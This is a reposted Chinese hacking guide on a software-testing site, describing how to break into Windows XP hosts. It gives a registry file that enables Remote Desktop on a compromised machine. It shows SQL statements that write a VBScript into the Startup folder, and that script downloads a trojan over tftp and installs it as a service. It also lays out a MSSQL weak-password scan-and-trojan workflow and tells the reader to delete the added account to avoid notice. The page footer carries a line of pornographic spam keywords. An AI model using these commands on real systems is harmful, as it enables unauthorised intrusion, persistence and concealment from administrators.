• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    關于入侵XP的小結

    發布: 2007-5-05 22:18 | 作者: 網絡轉載 | 來源: 轉載 | 查看: 89次 | 進入軟件測試論壇討論

    領測軟件測試網 xp攻略  
    windows xp 是微軟的拳頭產品,入侵xp一向來都是很困難,但并不是不能入侵,  
    只是xp的安全性相對于windows其它糸列好些罷了,下面是xp的一些基本特點:  
    1)xp的ipc$命名管道默認是guest用戶權限登陸,并且密碼不能為空,可以通過mmc  
    根節點管理單元去修改,充許任何用戶權限登陸,但需桌面交互,和獲得管理員權限.  

    2)xp自帶的遠桌面連接(3389終端),安裝時默認已經安裝和啟動,但要遠程連接,還  
    需做一步功夫,最簡單的方法遠程修改注冊表(這種方法好處在于不用桌面交互),當  
    然你也可以用slave等遠程桌面管理軟件來開啟,但這樣風險要大一些,你總不能讓  
    管理員看到桌面的鼠標到處亂竄吧.下面給出注冊表修改方法:  
    新建一注冊表文件,內容為:  
    regedit4 (一定要大寫)  

    [hkey_local_machine\system\currentcontrolset\control\terminal serve]  
    "fdenytsconnections"=dword:00000000  
    假如把上面的注冊表文件存為3389.reg,把3389.reg上傳到肉機執行regedit /s 3389.reg  
    ,這樣就可以遠程連接了,其實用fc方法你還可得到更多破解xp限制的方法,我和大家一  
    樣,太懶了.  

    3)xp并不是一個標準的多用戶糸統,同一時間只能充許一個用戶連接和登陸,建義使用  
    system權限進入xp主機(基本上所有的木馬程序都是用system權限登陸的),所以通過各種  
    方法入侵xp主機后的第一步并不是添加一個用戶名,而是上傳一個木馬程序更為實際.  
    因為在沒有開啟終端或仿真終端的情況下,就算告訴你一臺xp主機的用戶和密碼,你可能亦無  
    可奈何,隨非你自已用來攻擊的攻擊平臺是win98+winxp雙重啟動,才有能實現.  

    4)xp的自動更新功能,令人頭痛.win2k的入侵在一定的程度上是利用了管理員的疏忽和懶惰  
    面xp卻填補了這一點,在線自動更產功能會第一時間自動更新xp的新漏洞,如win2k的webdav  
    漏洞,已出了很久的一段時間了,而還有這個漏洞的主機"大大的有",連國內一個大型的門戶網  
    站的新聞網這個漏洞現在還沒補上,而上星期出的針對xp英文版的perl代碼溢出漏洞你到國外  
    網站看看,還有幾臺有這個漏洞的主機,這就是xp在線更新功能的強悍這處.  

    5)xp自帶防火墻  

    6)xp中的仿真終端服務啟動后默認為ntlm驗證,可以用xp自帶的tlntadmn命令開啟遠程主機的telnet  
    仿真終端服務,而shutdown命令可以關閉遠程主機,sc命令也以配置遠程服務......,這些是xp自帶的小  
    工具  

    7)想映射和共享xp的硬盤,隨非你在對方的本地安全策略中把帶有拒絕的字元冊掉.  

    8)ca 已經過時了  

    9)講得太多了,下面是一些xp的經典入侵手法,有些地方本人改良改良,如有雷同純屬巧合.  

    mysql入侵  
    在mysql入侵中我用到了hotmail的 wineggdropshell v1.35,本人認為是眾我版本中最穩定的版本  
    為了方便輸入我把它改名win135.exe  
    [1]用mysql連接你擁有用戶名和密碼的遠程mysql數庫.  
    [2]新建一個數據表后,安格式把下面兩行語句寫到新建的數據表中假如你新建的數據表為aa,  
    (1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");  
    (2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");  

    上面的語句是利用腳本調用dos命令中的條件命令,意思是:從tftp服務器下載win135.exe 如果成功就安裝win135服務其它退出  
    如果安裝win135服務成功就啟動win135服務,其它退出.注意,第二條語句比較長,但不要把第二條語句包含的幾條命令分開處理  
    如果分開處理就會出現win135還沒下載下來就執行其它命令這樣會出錯誤,你可以用腳本新建一用戶名,但沒用的,因為有xp的用  
    戶名并不一定能登陸,本腳本的好處在于能自動下載木馬程序并運行,只要對方重啟,你就可以用木馬的system權限登陸以方主機  
    再下載3389.reg用regedit /s 3389.reg開啟對方的3389,新建用戶名后用3389登陸,至于怎樣令xp重啟就不用我說了吧,另外你的tftp服務器要保證在線  
    [3]把新建的數據表為腳本文件并導出到啟動項:  
    select * from aa into outfile "c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啟動\\aa.vbs";  
    [4]保存成功后,只要對方重啟你就可以用木馬登陸了  

    mssql入侵,最經典不過了  
    [1]掃描1433端口開放的主機,用raptor制作一個純ip文本  
    [2]導入scanner掃描開放5000端口的主機  
    [3]把開放5000端口的主機再制作一個純ip文本  
    [4]導入x-scan中掃描mssql弱口令  
    [5]用sqlexec連接帶有弱口令的主機  
    [6]用tftp上傳木馬  
    [7]用木馬的system權限登陸后,再上傳3389.reg  
    [8]用regedit /s 3389.reg 命令開啟終端  
    [9]建一用戶名后,可以用3389客戶端登陸了  
    [10]用3389登陸后.別忘了冊掉新建的用戶,因為xp登陸對話框中會把新建的用戶顯示出來.

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/

    TAG: 安全


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備2023014753號-2
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>